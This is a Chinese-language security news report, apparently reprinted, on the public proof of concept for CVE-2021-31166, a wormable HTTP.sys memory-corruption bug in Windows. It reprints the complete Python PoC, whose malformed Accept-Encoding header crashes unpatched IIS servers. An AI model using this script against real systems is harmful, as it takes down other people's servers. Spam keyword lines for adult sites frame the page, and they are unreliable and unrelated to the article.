成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Windows操作系統HTTP協議棧內存破壞漏洞PoC公開

安全 網站安全
CVE-2021-31166漏洞是Windows操作系統中HTTP 協議棧的內存破壞漏洞。該協議棧是Windows內置的IIS 服務器使用的。如果IIS 服務器啟用,攻擊者就可以發送偽造的包來在操作系統kernel上執行也代碼。

[[400112]]

 5月微軟補丁日修復了一個CVSSv3評分9.8分的嚴重安全漏洞,該漏洞CVE編號為CVE-2021-31166。近日,有研究人員在GitHub上公布了該漏洞的PoC代碼。

CVE-2021-31166漏洞是Windows操作系統中HTTP 協議棧的內存破壞漏洞。該協議棧是Windows內置的IIS 服務器使用的。如果IIS 服務器啟用,攻擊者就可以發送偽造的包來在操作系統kernel上執行也代碼。微軟稱該漏洞可以被用來創建網絡蠕蟲,因此建議優先修復。

雖然該漏洞CVSS評分為9.8分,聽起來非常危險,但該漏洞只影響最新的一些Windows版本,具體影響Windows 10、Windows server 2004、Windows server 20H2的不同版本。

5月17日,安全研究人員Axel Souchet在GitHub上公開了該漏洞的PoC代碼。該PoC代碼可以使運行IIS 服務器的未修復的Windows系統奔潰,但是并沒有實現蠕蟲功能。

PoC代碼參見:https://github.com/0vercl0k/CVE-2021-31166

  1. import requests 
  2. import argparse 
  3.   
  4.   
  5. def main(): 
  6.     parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys'
  7.     parser.add_argument('--target', required = True
  8.     args = parser.parse_args() 
  9.     r = requests.get(f'http://{args.target}/', headers = { 
  10.         'Accept-Encoding''doar-e, ftw, imo, ,'
  11.     }) 
  12.     print(r) 

PoC視頻參見: https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif

本文翻譯自:https://therecord.media/poc-released-for-wormable-windows-iis-bug/如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2010-01-20 10:38:54

2009-10-26 08:50:44

Windows 7競爭蘋果

2021-07-22 23:16:15

2025-01-07 13:36:51

2010-01-25 11:28:59

2013-07-11 09:25:49

2022-02-10 07:13:40

SSH協議客戶端服務端

2022-08-04 08:44:31

Android系統攻擊鏈

2020-12-25 10:08:30

漏洞Windows操作系統

2010-04-20 14:17:21

Unix操作系統

2020-10-15 10:54:31

安全漏洞微軟

2009-09-04 10:47:33

2022-11-28 07:21:53

操作系統內存管理

2010-04-15 11:41:40

Unix操作系統

2023-04-07 09:12:11

2021-11-10 11:51:33

BrakTooth安全漏洞藍牙設備

2009-12-08 18:02:50

2009-12-04 17:54:07

Windows 7操作

2015-01-05 14:24:12

2009-12-16 09:40:26

Linux操作系統
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品国产乱码久久久久久久久 | 国产乱码精品一区二区三区中文 | www.久久久.com | 国产高清一区二区 | 日韩视频―中文字幕 | 天天草视频 | 色网在线观看 | 精品久久久久久久久久久久 | 国产一级一级毛片 | 国产伦一区二区三区 | 国内精品视频免费观看 | 在线观看www | www性色| 三级av在线 | 久久伊人在 | 国产精品18久久久久久久 | 剑来高清在线观看 | 韩日精品一区 | 精品日韩 | www日本在线观看 | 国产精品视频久久久 | 精品日韩 | 国产一区久久久 | jizz18国产| 日本精品视频 | 欧美精品乱码99久久影院 | 99精品欧美一区二区三区综合在线 | 欧美区在线 | 日韩成人在线网站 | 亚洲一区二区三区视频在线 | 亚洲国产精品久久久 | 国产精品欧美日韩 | 欧美精品一区二区三区蜜臀 | 国产精品爱久久久久久久 | 亚洲男人网 | 中文字幕一区在线观看视频 | 国产欧美一区二区精品久导航 | 精品国产黄色片 | 日韩中文字幕一区 | 日韩视频一区二区 | 色眯眯视频在线观看 |